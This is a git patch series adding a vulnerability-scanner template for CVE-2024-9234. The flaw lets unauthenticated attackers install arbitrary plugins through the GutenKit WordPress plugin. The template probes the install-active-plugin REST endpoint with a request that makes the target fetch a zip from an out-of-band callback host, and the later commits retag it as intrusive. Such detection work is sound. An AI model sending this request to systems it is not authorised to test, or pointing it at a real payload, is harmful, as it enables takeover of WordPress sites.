From 04aff8570b726295096e9b782e4db767c750ee16 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Sun, 20 Oct 2024 16:53:59 +0300 Subject: [PATCH 1/3] add CVE-2024-9234 --- http/cves/2024/CVE-2024-9234.yaml | 60 +++++++++++++++++++++++++++++++ 1 file changed, 60 insertions(+) create mode 100644 http/cves/2024/CVE-2024-9234.yaml diff --git a/http/cves/2024/CVE-2024-9234.yaml b/http/cves/2024/CVE-2024-9234.yaml new file mode 100644 index 0000000000..a196cc1f26 --- /dev/null +++ b/http/cves/2024/CVE-2024-9234.yaml @@ -0,0 +1,60 @@ +id: CVE-2024-9234 + +info: + name: GutenKit <= 2.1.0 - Unauthenticated Arbitrary File Upload + author: s4e-io + severity: critical + description: | + The GutenKit Page Builder Blocks, Patterns, and Templates for Gutenberg Block Editor plugin for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the install_and_activate_plugin_from_external() function (install-active-plugin REST API endpoint) in all versions up to, and including, 2.1.0. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins, or utilize the functionality to upload arbitrary files spoofed like plugins. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-9234 + - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gutenkit-blocks-addon/gutenkit-210-unauthenticated-arbitrary-file-upload + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-9234 + cwe-id: CWE-862 + epss-score: 0.00045 + epss-percentile: 0.16482 + metadata: + verified: true + max-request: 2 + vendor: wpmet + product: gutenkit + framework: wordpress + fofa-query: body="wp-content/plugins/gutenkit-blocks-addon" + tags: cve,cve2024,wordpress,wp-plugin,gutenkit,file-upload +variables: + filename: "{{rand_text_alpha(12)}}" + +flow: http(1) && http(2) + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body, "/wp-content/plugins/gutenkit-blocks-addon")' + - 'status_code == 200' + condition: and + internal: true + + - raw: + - | + POST /wp-json/gutenkit/v1/install-active-plugin HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + plugin=http://{{interactsh-url}}/{{filename}}.zip + + matchers: + - type: dsl + dsl: + - 'contains_all(body, "Failed to unzip plugin", "success\":false")' + - 'contains(content_type, "application/json")' + - 'status_code == 200' + condition: and From 5ca8034a45bdefb87bff760538b10cda566a11c4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 21 Oct 2024 05:51:40 +0530 Subject: [PATCH 2/3] added missing tag --- http/cves/2024/CVE-2024-9234.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-9234.yaml b/http/cves/2024/CVE-2024-9234.yaml index a196cc1f26..d518fd0e41 100644 --- a/http/cves/2024/CVE-2024-9234.yaml +++ b/http/cves/2024/CVE-2024-9234.yaml @@ -23,7 +23,8 @@ info: product: gutenkit framework: wordpress fofa-query: body="wp-content/plugins/gutenkit-blocks-addon" - tags: cve,cve2024,wordpress,wp-plugin,gutenkit,file-upload + tags: cve,cve2024,wordpress,wp-plugin,gutenkit,file-upload,intrusive + variables: filename: "{{rand_text_alpha(12)}}" From 16f777353591ade597afb0bc4b9fa0e8fdda75c4 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 22 Oct 2024 14:20:22 +0530 Subject: [PATCH 3/3] Update CVE-2024-9234.yaml --- http/cves/2024/CVE-2024-9234.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-9234.yaml b/http/cves/2024/CVE-2024-9234.yaml index d518fd0e41..8f2b1a8721 100644 --- a/http/cves/2024/CVE-2024-9234.yaml +++ b/http/cves/2024/CVE-2024-9234.yaml @@ -1,7 +1,7 @@ id: CVE-2024-9234 info: - name: GutenKit <= 2.1.0 - Unauthenticated Arbitrary File Upload + name: GutenKit <= 2.1.0 - Arbitrary File Upload author: s4e-io severity: critical description: |